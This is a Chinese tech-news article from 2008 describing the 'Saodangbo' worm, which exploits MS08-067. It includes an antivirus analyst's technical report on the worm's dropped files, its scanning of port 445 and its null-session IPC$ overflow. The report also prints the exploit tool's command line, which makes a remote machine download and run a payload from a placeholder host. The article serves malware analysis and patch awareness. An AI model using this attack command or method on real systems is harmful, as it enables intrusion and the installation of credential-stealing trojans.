IT资讯/综合软件下载站!┆ 最新软件 最新文章 最新手机 UFO外星人 网站分类

您当前的位置→图文中心新闻资讯业界快讯“扫荡波”蠕虫泛滥 未打补丁系统遭殃

“扫荡波”蠕虫泛滥 未打补丁系统遭殃


2008/11/15 7:53:27 编辑:佚名 来源:本站整理 
今天给大家分享“扫荡波”蠕虫泛滥 未打补丁系统遭殃业界快讯文章。喜欢的可以分享“扫荡波”蠕虫泛滥 未打补丁系统遭殃给你的好友。

在我的印象中, 每一个传播严重的蠕虫都和一个系统漏洞有关:SQL Server蠕虫王, 数小时传遍全球;冲击波、震荡波让普通网民认知到蠕虫的威力。 而这个MS08-067漏洞, 在补丁发布数周之后, 还没有发现蠕虫泛滥, 也可能是众多可替代微软update补丁的修复方案越来越普及的原因。   事实上, 在这个漏洞发布之后不久, 在制造木马盗号的圈子里, 各种不同版本的扫描器、批量抓鸡工具在迅速泛滥。 因此证明, 没有完美的漏洞修复方案, 互联网上总是很容易就找到大量不打补丁的计算机。   上周末, 把木马下载器、漏洞扫描工具、蠕虫集成在一起的病毒终于泛滥。 在这之前, 一直有不少网民报告系统崩溃不能上网的现象, 但一直没有捕获病毒样本。 原来这一类病毒入侵后, 会尝试删除自身, 抓到的样本只是木马下载器, 而蠕虫在得手后就自杀了, 这在某种程度上也削弱了蠕虫的传播范围。   以下是毒霸分析员对Worm.SaodangBo.a.94208的技术分析  MS08-067远程下载者(扫荡波)分析报告  1. 释放病毒体  病毒运行后释放以下文件:  aaa.bat  mrosconfig.exe  vista.exe  qqq.sys  其中aaa.bat控制整个病毒的运行流程。   2. 扫描网内计算机  首先调用vista.exe对本网段(C类)范围内的所有计算机的445端口进行扫描。 之后, 挑选出可以连上445端口的计算机保存到一个列表文件中。   3. 攻击在线的计算机(有漏洞的会出现现象或中毒)  然后, 病毒调用mrosconfig.exe对列表文件中的计算机发送RPC请求, 使远程计算机中的svchost.exe中解析RPC路径时溢出, 在远程计算机中下载并执行http://xxx.xxx.com/down/ko.exe。   mrosconfig.exe是一个实现下载者功能的远程溢出利用工具, 对应的命令行为:  mrosconfig.exe 要攻击的计算机的IP 要在远程下载的病毒的url  如:  mrosconfig.exe 127.0.0.1 http://xxx.xxx.com/down/ko.exe  具体的步骤如下:  (1)使用空用户、空密码连接上远程计算机上的IPC$共享。   (2)向连上的计算机发送远程路径.\\a\..\..\NN。 如果远程计算机上未修复MS08-067漏洞, 那么svchost.exe调用NetpwPathCanonicalize函数解析此路径时会溢出, 从而执行远程路径后的指令。   (3)溢出指令下载附在指令后的url对应的文件到远程计算机上, 并运行此文件。   (4)下载的文件是一个木马下载者, 该下载者还会下载其他木马程序安装到被攻击计算机上。 已知会下载的木马程序包括:机器狗木马下载器, QQ三国、完美系列网游等游戏盗号器。   如果攻击失败, 则远程计算机会出现“SVCHOST.exe”出错提示, 只有这个现象是用户可见的。   如果用户反映这个问题, 则可以认为其所在的局域网内有机器中毒, 但自身没有中, 打上补丁就可以避免。   4. 自删除病毒体  删除释放的:mrosconfig.exe、vista.exe、qqq.sys、aaa.bat病毒文件。

喜欢业界快讯的网友不妨去看看下面的文章:
  • 12下一页

    相关文章
  • 支付宝“扫一扫”上线520彩蛋:漫天气球,戳破更有爱
  • 【埃及公布】“扫描金字塔”的初步结果
  • “扫荡波”蠕虫泛滥 未打补丁系统遭殃
  • 08年最大蠕虫病毒“扫荡波”爆发 数十万电脑网络崩溃
  • “扫荡波”来袭 已造成大面积用户系统崩溃
  • 相关推荐
    发表评论
    栏目列表
    阅读排行
    网站帮助 - 广告合作 - 下载声明 - 网站地图